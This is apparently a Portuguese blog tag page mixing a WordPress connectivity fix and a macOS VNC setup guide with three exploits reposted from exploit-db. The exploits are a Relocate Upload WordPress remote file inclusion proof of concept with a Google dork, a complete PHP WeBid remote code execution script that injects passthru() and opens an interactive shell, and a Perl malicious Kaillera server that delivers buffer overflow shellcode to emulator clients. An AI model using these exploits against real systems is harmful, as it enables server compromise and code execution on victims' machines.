Tag: remote

Qualquer conexão com WordPress vem o erro ao XXX wordpress Ocorreu um erro inesperado.

by OwnServer

Se você está recebendo a mensagem -> Ocorreu um erro inesperado (unexpected error) <— ao tentar fazer QUALQUER coisa remota do wordpress (instalar uma versão, atualizar um plugin, instalar um plugin, ver o Akismet e etc) nem se preocupe, a saída é simples e clara:

1 – Veja se a porta de saída 80 está liberada no seu firewall (bom deixar também a 443 de SSL),

2 – Veja se as pastas do wordpress estão com permissão correta (755 sob suExec ou 777 em DSO sem suExec), assim como arquivos php com permissões corretas -> 644.

3 – Caso os dois pontos acima estejam ok mande o admin do servidor fazer um teste, no arquivo /etc/resolv.conf mande colocar no começo do arquivo:

nameserver 8.8.8.8

nameserver 8.8.4.4

Esses dois nameservers resolvem publicamente usando infra-estrutura “fraquinha da Google”.

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

by OwnServer


# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('db_unx_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Fonte: http://www.exploit-db.com/exploits/17869/

Como conectar no Mac os X Snow leopard | Lion via Remote Desktop

by OwnServer

Bom, galera, nós do 4ppun1x conectamos remotamente neste bsd maravilhoso que é o mac afim de que pudéssemos fazer ajustes remotos em nosso pc. Este how to resume-se em habilitar o suporte VNC do mac juntamente com uma senha de segurança para que nosso mac fique tranquilo e seguro para aceitar conexões de rede sem qualquer stress.
Estamos usando o mac os x Snow Leopard (mas funciona no mac os x lion), assim como uma conexão comum (feita de um router wireless) e usando Windows (ops, ruindows) seven e o cliente vnc TightVNC (mostraremos o link de download), que além de free atende bem pra caramba.
Bora simbora e deixar de balela?

Primeiro devemos adentrar nas preferências do sistema afim de irmos aos menus principais de configurações do mac, acompanhe o print:

Clicando no menu de preferências do mac
Clicando no menu de preferências do mac

Agora iremos clicar no menu de preferências:

menus principais SHARING
menus principais SHARING

Pronto, devemos ir na área de Sharing (ali liberamos apache, acesso remoto, compartilhamento de arquivos e etc):

Marcando acesso remoto
Marcando acesso remoto

Assim que marcamos a opção REMOTE MANAGEMENT o menu do print acima é exibido.

Iremos comentar cada opção marcada:

1 – Observe (modo de observação), marcamos o control para permitir controle por parte do acesso remoto (neste caso nosso pc Window$ 7), A opção de mostrar quando há alguém observando o pc é bom de estar marcada (é, meu amigo, alguém dentro e você sem saber é osso né?),

2 – Generate Reports é bom estar marcado pois gera logs (vai que alguém faz besteira?),

3 – Open and Quit app… Deixa marcado, afinal de contas isto habilita o suporte para o cliente remoto poder executar aplicativos,

4 – Change Settings, bem, em um caso de setup, por que não deixar ativo? Vale a pena sim! Se você precisar de um ajuste aqui ou ali deve ter isto ON.

5 – Delete e replace items é bom, afinal de contas direito de escrever, ler e executar, para acesso remoto é quase um padrão.

6 – Start text… é bom quando se quer trocar idéia com o cliente remoto, deixamos on.

7 – Restart and Shutdown, meu amigo, se alguém precisa aplicar mudanças críticas e positivas em seu Mac Os X, por que não deixar este recurso para o acesso remoto? Se achar inviável que alguém remotamente desligue seu apple, deixe isto desmarcado.

8 – Suporte a cópia de itens é bom ;), deixe on.

Assim que damos ok é solicitada autorização do user afim de que seja validada a mudança, mas para que isto ocorra de verdade devemos clicar na opção COMPUTER SETTINGS para poder deixar a coisa no ponto (é aqui que aplicamos a senha de acesso remoto, afinal de contas deixar um mac com todos os recursos globais e ainda deixar sem senha é tiro de calibre 12 no próprio pé, né?

Aplicando senha e confirmando
Aplicando senha e confirmando

Deixe em vnc viewers a senha (coloque algo usando caracteres especiais para dificultar a vida dos lamers, use #$%&*@./<> com caracteres de senha).

Assim que aplicar você precisará confirmar usando sua senha de usuário do sistema, confirme com sua senha (vide print a seguir):

Confirmar senha no Mac Os X
Confirmar senha no Mac Os X

Pode ser que nós (appunix e você), algum dia, nesta vida de trabalhador braçal, possamos nos perguntar?

Como descubro meu ip nesse danado desse mac?

Relaxa, lembra do esquema de Central das preferências do mac? Então, a gente confirmar o Sharing e volta lá, no menu networking, ou seja: Preferências do Sistema-> Network.

Veja o ícone no MEIO da central de preferências:

Centralizador de Preferências do Mac Os X
Centralizador de Preferências do Mac Os X

Pronto, depois é só clicar em Redes (Network) e meter bala, veja o danado do IP no MEIO da nova tela:

Olha o ipzão aí gente
Olha o ipzão aí gente

 

Pronto, já temos o ip em mãos, no meu caso a terminação é 104. O que devemos fazer?

No Microsoft Windows 7 devemos baixar o cliente VNC Free, para isso acesse o linkÇ

http://www.tightvnc.com/download/1.3.10/tightvnc-1.3.10-setup.exe

Baixe o cliente e em seguida abra-o.

Assim que executar o tightvnc você vai ver a seguinte tela:

cliente VNC
cliente VNC

Assim que confirmar o acesso ele vai mostrar uma tela requisitando senha, igual essa aqui ó:

senha VNC
senha VNC

Confirme com aquela senha que você definiu nas propriedades de acesso remoto de seu macosx e FINISH!

 

Curtiu?

Curtimos também.
Abraços a todos e obrigado pela visita!

WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit

by OwnServer

/*

------------------------------------------------------------
WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit
------------------------------------------------------------

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.webidsupport.com/

This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

[-] Vulnerable code to SQL injection in feedback.php:

154. $query = "SELECT title FROM " . $DBPrefix . "auctions WHERE id = " . $_REQUEST['auction_id'] . " LIMIT 1";
155. $res = mysql_query($query);
156. $system->check_mysql($res, $query, __LINE__, __FILE__);
157. $item_title = mysql_result($res, 0, 'title');

Input passed through $_REQUEST['auction_id'] isn't properly sanitised before being used in the SQL query at line 154.

[-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in logout.php:

21. if (isset($_COOKIE['WEBID_RM_ID']))
22. {
23. $query = "DELETE FROM " . $DBPrefix . "rememberme WHERE hashkey = '" . $_COOKIE['WEBID_RM_ID'] . "'";
24. $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
25. setcookie('WEBID_RM_ID', '', time() - 3600);
26. }

Input passed through $_COOKIE['WEBID_RM_ID'] isn't properly sanitised before being used in the SQL query at line 23.

[-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in user_login.php:

84. if (isset($_COOKIE['WEBID_ONLINE']))
85. {
86. $query = "DELETE from " . $DBPrefix . "online WHERE SESSION = '" . $_COOKIE['WEBID_ONLINE'] . "'";
87. $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
88. }

Input passed through $_COOKIE['WEBID_ONLINE'] isn't properly sanitised before being used in the SQL query at line 86.

[-] Vulnerable code to arbitrary PHP code jnjection (works with magic_quotes_gpc = off) in /includes/converter.inc.php:

61. function buildcache($newaarray)
62. {
63. global $include_path;
64.
65. $output_filename = $include_path . 'currencies.php';
66. $output = " 67. $output.= "\$conversionarray[] = '" . time() . "';\n";
68. $output.= "\$conversionarray[] = array(\n";
69.
70. for ($i = 0; $i < count($newaarray); $i++)
71. {
72. $output .= "\t" . "array('from' => '" . $newaarray[$i]['from'] . "', 'to' => '" . $newaarray[$i]['to'] . "', 'rate' => '" . $newaarray[$i]['rate'] . "')";
73. if ($i < (count($newaarray) - 1))
74. {
75. $output .= ",\n";
76. }
77. else
78. {
79. $output .= "\n";
80. }
81. }
82.
83. $output .= ");\n?>\n";
84.
85. $handle = fopen($output_filename, 'w');
86. fputs($handle, $output);
87. fclose($handle);
88. }

Input passed to buildcache() function through $_POST['from'] or $_POST['to'] isn't properly sanitised before being
written to currencies.php file, this can lead to arbitrary PHP code injection.

[-] Vulnerable code to LFI (works with magic_quotes_gpc = off) in /includes/converter.inc.php:

18. if (isset($_GET['lan']) && !empty($_GET['lan']))
19. {
20. if ($user->logged_in)
21. {
22. $query = "UPDATE " . $DBPrefix . "users SET language = '" . mysql_real_escape_string($_GET['lan']) . "' WHERE id = " . $user->user_data['id'];
23. }
24. else
25. {
26. // Set language cookie
27. setcookie('USERLANGUAGE', $_GET['lan'], time() + 31536000, '/');
28. }
29. $language = $_GET['lan'];
30. }
31. elseif ($user->logged_in)
32. {
33. $language = $user->user_data['language'];
34. }
35. elseif (isset($_COOKIE['USERLANGUAGE']))
36. {
37. $language = $_COOKIE['USERLANGUAGE'];
38. }
39. else
40. {
41. $language = $system->SETTINGS['defaultlanguage'];
42. }
43.
44. if (!isset($language) || empty($language)) $language = $system->SETTINGS['defaultlanguage'];
45.
46. include $main_path . 'language/' . $language . '/messages.inc.php';

Input passed through $_GET['lan'] or $_COOKIE['USERLANGUAGE'] parameter isn't properly sanitised before

being used to include files on line 46. This can be exploited to include arbitrary local files.

[-] Information leak vulnerability into /logs directory, cause anyone can read cron.log and error.log

[-] Disclosure timeline:

[19/06/2011] - Vulnerabilities discovered
[19/06/2011] - Vendor contacted
[20/06/2011] - Vendor contacted again
[21/06/2011] - No response from vendor
[21/06/2011] - Issue reported to http://sourceforge.net/apps/mantisbt/simpleauction/view.php?id=34
[22/06/2011] - Issue reported to http://www.webidsupport.com/forums/project.php?do=issuelist&projectid=1
[22/06/2011] - Vendor responsed and released patches: http://www.webidsupport.com/forums/showthread.php?3892
[04/07/2011] - Public disclosure

*/

error_reporting(E_ERROR);
set_time_limit(0);

if (!extension_loaded("curl")) die("cURL extension required\n");

$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_VERBOSE, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

function http_post($page, $data)
{
global $ch, $url;

curl_setopt($ch, CURLOPT_URL, $url.$page);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);

return curl_exec($ch);
}

print "\n+----------------------------------------------------------------------+";
print "\n| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |";
print "\n+----------------------------------------------------------------------+\n";

if ($argc < 2)
{
print "\nUsage......: php $argv[0] \n";
print "\nExample....: php $argv[0] https://localhost/";
print "\nExample....: php $argv[0] http://localhost/webid/\n";
die();
}

$url = $argv[1];

$code = rawurlencode("\0'));print('_code_');passthru(base64_decode(\$_POST['c'])//");
http_post("converter.php", "action=convert&from=USD&to={$code}");

while(1)
{
print "\nwebid-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_post("includes/currencies.php", "c=".base64_encode($cmd)), $m) ? print $m[1] : die("\n[-] Exploit failed\n");
}
?>

Fonte: http://www.exploit-db.com/exploits/17487/

Kaillera Multiple Clients Buffer Overflow Vulnerabilities

by OwnServer

#!/usr/bin/perl
# Exploit Title: Remote Buffer Overflows in Kaillera clients
# Date: 6/30/11
# Author: sil3nt_dre4m
# Software Link: Multiple:
# 1.  Kaillera original client: An emulator to download with this client bundled with it is Project64K 0.13: http://www.zophar.net/download_file/1907
# 2.  Supraclient 0.85.2 CPPE : This client can be found here: http://morphus56k.110mb.com/website/downloads/SupraclientCPPE_v0.85.2.zip
# 3.  Open Kaillera p2p client: http://sourceforge.net/projects/okai/files/Client/n02.p2p%20v0/n02.P2P.v0r6.client.v0.5r0.zip/download
# Version: Multiple-see below
# Tested on: Windows XP, Windows 7
#Introduction:
#This script acts as a Kaillera server in order to exploit various Kaillera clients.
#Kaillera facilitates playing emulator games over a network.
#The Kaillera protocol is built on top of UDP and is mostly documented here: http://www.emulinker.com/index.php?page=Documentation&help=true
#Kaillera clients implement this protocol, and many of them have serious vulnerabilities in their code.
#This server is capable of exploiting buffer overflows in the following clients:
#Exploit tested against Windows 7 and XP machines, gets around ASLR (modules don't have it loaded).
#Note: If you wish to exploit the same client twice, you will need to restart the server.
#To reproduce the bugs shown here:
#1.  Download the Kaillera client you wish to test bug on.
#2.  Download emulator capable of Kaillera netplay, or one which this script targets (Mame32k, and so forth).
#3.  Overwrite existing kailleraclient.dll with the one you wish to exploit (Supraclient, open kaillera, original client).
#4.  Look for something that says netplay or Kaillera, and select it.  In each emulator its different, for instance in Project64K go to File > Start Netplay.
#5.  Run this server and connect to the IP its hosted on with the kaillera client.
#Greetz to: Blindgeek and jediknight304 for much help with this script, corelanc0d3r for
#awesome tutorials on buffer overflows, and Requiem for help with fixing security bugs in Kaillera clients.
#DISCLAIMER: I'm not responsible for how you use this code.
#By running this code, you agree to accept responsibility for how you use it and you agree to not hold me responsible for any problems arising from running this code.
#Final Note: For more information on Kaillera vulnerabilities and remediation information, check out http://kaillerahacks.blogspot.com/.
use strict;
use warnings;
use IO::Socket;
use Getopt::Long;
use Digest::MD5 qw(md5);
use subs qw(sendmessage help);
### Shellcode- spawn calc.exe from Metasploit Framework - ###
my $sc =
"\x31\xc9\xdd\xc5\xb8\xe6\xd8\x80\xa4\xb1\x33\xd9\x74\x24" .
"\xf4\x5a\x31\x42\x16\x83\xea\xfc\x03\x42\xf4\x3a\x75\x58" .
"\x10\x33\x76\xa1\xe0\x24\xfe\x44\xd1\x76\x64\x0c\x43\x47" .
"\xee\x40\x6f\x2c\xa2\x70\xe4\x40\x6b\x76\x4d\xee\x4d\xb9" .
"\x4e\xde\x51\x15\x8c\x40\x2e\x64\xc0\xa2\x0f\xa7\x15\xa2" .
"\x48\xda\xd5\xf6\x01\x90\x47\xe7\x26\xe4\x5b\x06\xe9\x62" .
"\xe3\x70\x8c\xb5\x97\xca\x8f\xe5\x07\x40\xc7\x1d\x2c\x0e" .
"\xf8\x1c\xe1\x4c\xc4\x57\x8e\xa7\xbe\x69\x46\xf6\x3f\x58" .
"\xa6\x55\x7e\x54\x2b\xa7\x46\x53\xd3\xd2\xbc\xa7\x6e\xe5" .
"\x06\xd5\xb4\x60\x9b\x7d\x3f\xd2\x7f\x7f\xec\x85\xf4\x73" .
"\x59\xc1\x53\x90\x5c\x06\xe8\xac\xd5\xa9\x3f\x25\xad\x8d" .
"\x9b\x6d\x76\xaf\xba\xcb\xd9\xd0\xdd\xb4\x86\x74\x95\x57" .
"\xd3\x0f\xf4\x3d\x22\x9d\x82\x7b\x24\x9d\x8c\x2b\x4c\xac" .
"\x07\xa4\x0b\x31\xc2\x80\xe3\x7b\x4f\xa0\x6b\x22\x05\xf0" .
"\xf6\xd5\xf3\x37\x0e\x56\xf6\xc7\xf5\x46\x73\xcd\xb2\xc0" .
"\x6f\xbf\xab\xa4\x8f\x6c\xcc\xec\xf3\xf3\x5e\x6c\xda\x96" .
"\xe6\x17\x22\x53";
########Variables##############
my $adjust ="\x81\xc4\x54\xf2\xff\xff"; # add esp, -3500 adjusts the stack
my $ack="\x05\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00"; #ACK packet in Kaillera protocol, see docs
my $ServerStatus="\x04" . "\x00" x 9; # No other users shown in server.
my $oldjunk="A" x 92; #For exploiting old Kaillera client username BOF.
my $junk="A" x 2082; #For exploiting P2P Kaillera client
my $suprajunk="A" x 2048; #Supraclient junk
my $MOTDHeader="\x17" . "Server\0";
my $MOTDMessage="Hello, Welcome to the Server\0";
my $nseh="\xeb\x06\x90\x90"; #short jmp for SEH exploits
my $seh, my $eip;
my $ServerExploit;
my $username;
my %inc; #increments a counter per client connected to us, each time a message is sent
my ($port, $ip, $help, $target, $listtarget, $listemu, $emu, $delay, $debug);
$port = 27888;
GetOptions(
'port=i'=>\$port,
'ip=s' =>\$ip,
'help' =>\$help,
't=s' =>\$target,
'emu=s' =>\$emu,
'targets' =>\$listtarget,
'delay=i' =>\$delay,
'debug' =>\$debug,
'emus' =>\$listemu
);
if (defined $listtarget) {
print "\r\n=========Pick a version of Kaillera to attack :) ========\r\n\r\n" ;
print "1.  Kaillera 0.9/Anti3d  -t old \r\n\r\nPick emulator to target with -emu flag: mame32k, snes, mupen\r\n\r\n";
print "2.  SupraclientCPPE 0.85.2  -t supra:\r\n\r\nPick emulator to target with -emu flag: mame32, mupen\r\n\r\n";
print "3.  Open Kaillera n02v0r6  -t p2p (Universal Exploit)\r\n" ;
}
if (defined $listemu) {
print "\r\n=========Specific versions of emulators being attacked :) ============" . "\r\n\r\n" ;
print "Mame32k 0.64  -emu mame32k\r\n\r\n";
print "Mame32++ 0.117  -emu mame32\r\n\r\n";
print "Mupen64k 0.7.9  -emu mupen\r\n\r\n";
print "Snes9k 0.09  -emu snes\r\n";
}
help() if($help or not defined $ip or not defined $target);
#Note: add new targets like this, but make sure to use $variable when redefining, not "my $variablename" or it wont work from earlier scope.
#Also, note that target "old" uses SEH-based overflow while target "supra" uses EIP overwrite.
if ($target eq "old") {
if (not defined $emu) {
print "\r\nPick an emulator to target, this exploit isn't universal\r\n";
help();
}
if ($emu eq "mame32k") {
print "\r\nTargetting Mame32k 0.64 running with Kaillera client 0.9...\r\n";
$seh=pack('V',0x010B3A06); # #pop ebx - pop esi - ret at 0x010B3A06 [mame32k.exe]
}
elsif ($emu eq "snes") {
print "\r\nTargetting Snes9k 0.09 running with Kaillera client 0.9...\r\n";
$seh=pack('V',0x10018ECD); # pop ebx - pop ecx - ret at 0x10018ECD [sdl.dll]
}
elsif ($emu eq "mupen") {
print "\r\nTargetting Mupen64k 0.7.9 running with Kaillera client 0.9...\r\n";
$seh=pack('V', 0x67F46FEF); #pop edi - pop ebp - ret at 0x67F46FEF [mupen64_rsp_hle.dll].
}
else {
print "\r\nPick a valid emulator to target: -emus to list emulators \r\n";
help();
}
}
elsif ($target eq "p2p") {
print "\r\nTargetting P2P Client (Universal exploit)...\r\n";
if (defined $emu) {
print "\r\nUniversal exploit, no emu necessary...\r\n";
help();
}
}
elsif ($target eq "supra") {
if (not defined $emu) {
print "\r\nPick an emulator to target, this exploit isn't universal\r\n";
help();
}
if ($emu eq "mame32") {
print "\r\nTargetting Mame32++ 0.117 running with Supraclient...\r\n";
$eip=pack('V', 0x01C01104); #jmp esp in mameppkgui.exe
}
elsif ($emu eq "mupen") {
print "\r\nTargetting Mupen64k 0.7.9 running with Supraclient...\r\n";
$eip=pack('V', 0x10021C16); #jmp esp at 0x10021C16 [aziaudio.dll]
}
}
else {
print "\r\nPick a valid target, try -targets if you're lost.\r\n";
help();
}
my $hello = "HELLOD00D$port\0";
#Open a new socket, start an infinite loop receiving messages from clients
my $sock = IO::Socket::INET->new(Proto=>'udp', LocalPort=>$port) or die "Error opening $ip:$port \r\n$!";
print "Evil Kaillera Server Started on $ip:$port, waiting for victims :D\r\n";
my $msg_in;
my $MAX_MESSAGE_LENGTH=5000;
while (1) {
$sock->recv($msg_in,$MAX_MESSAGE_LENGTH);
my $packet = unpack 'H*', $msg_in;
if (defined $debug) {
print "Packet found: $packet\n";
}
my $peerhost = $sock->peeraddr;
my $peerport = $sock->peerport;
#Check for client hello, send server hello
if ($msg_in =~ m/HELLO0\.83/) {
print "Sending Hello...\n";
$sock->send($hello);
}
#Since we're using an IF loop for username detection, the scope needs to be over everything else,
#because local machine processes data faster than incoming network data.
#Otherwise, username won't be detected until AFTER ServerAnnouncement is sent and it wont work.
if ($msg_in =~ m/\x03(.*?\x00)/){
my $username = $1 ;
my $ServerAnnounce="\x02" . $username . substr(md5($username),0,2) . "\x00" x 4 . "\x01"; #Not Complete yet
if ($packet=~m/.{10}03/) {
if (defined $debug) {
print "Username $username found\r\n" . "Sending ACKs to client...\r\n";
}
sendpacket(\$sock, $ack) for (1..3);
sleep 1;
}
sendpacket(\$sock, $ServerStatus);
print "Sending ServerStatus...\r\n";
sendpacket(\$sock, $ServerAnnounce);
if ($target eq "p2p") {
print "Attacking p2p client...\r\n";
$eip=pack('V',0x100123F3); # call esp in kailleraclient.dll, universal
sendpacket(\$sock, $MOTDHeader.$junk.$eip.$sc);
print "Sending MOTD payload to P2PClient...\n";
if (defined $delay) {
sleep $delay;
}
}
if ($target eq "supra") {
print "Sending MOTD payload to Supraclient\r\n";
sendpacket(\$sock, $MOTDHeader.$suprajunk.$eip.$adjust.$sc);
if (defined $delay) {
sleep $delay;
}
}
if ($target eq "old") {
print "Sending Announce, MOTD to old kaillera client...\r\n";
sendpacket(\$sock, $MOTDHeader.$MOTDMessage);
my $ServerExploit="\x02" . $oldjunk . $nseh . $seh . $sc;
print "Sending ServerStatus payload to 0.9 client...\r\n";
sendpacket(\$sock, $ServerExploit);
if (defined $delay) {
sleep $delay;
}
}
}
}
$sock->close;
########### FUNCTIONS #####################
sub help{
print "\r\nUsage: $0 -port=1111 -ip=1.1.1.1 -t=supra -emu=mame32 -targets -emus -delay 10 -debug -help\n";
exit 0;
}
#This sendmessage function takes a message and an ip, and sends it nicely - thanks jediknight304
#sendpacket($socket, $message, $anothermessage);
sub sendpacket{
my $sock = shift;
bless $sock, "IO::Socket::INET";
my @messages = @_;
my $numberofmessages = @messages;
my $messagesbyte = pack('c',$numberofmessages);#how many messages are in our packet
my $packet;
for(@messages){
#each client has to have an incrementing packet number
my $header = pack('v', $inc{$$sock->peeraddr}++) . pack ('v', length($_));
$packet .= $header.$_;
}
$$sock->send($messagesbyte.$packet) or die "Couldn't send:\n$packet\n$!";

}

 

Fonte: http://www.exploit-db.com/exploits/17460/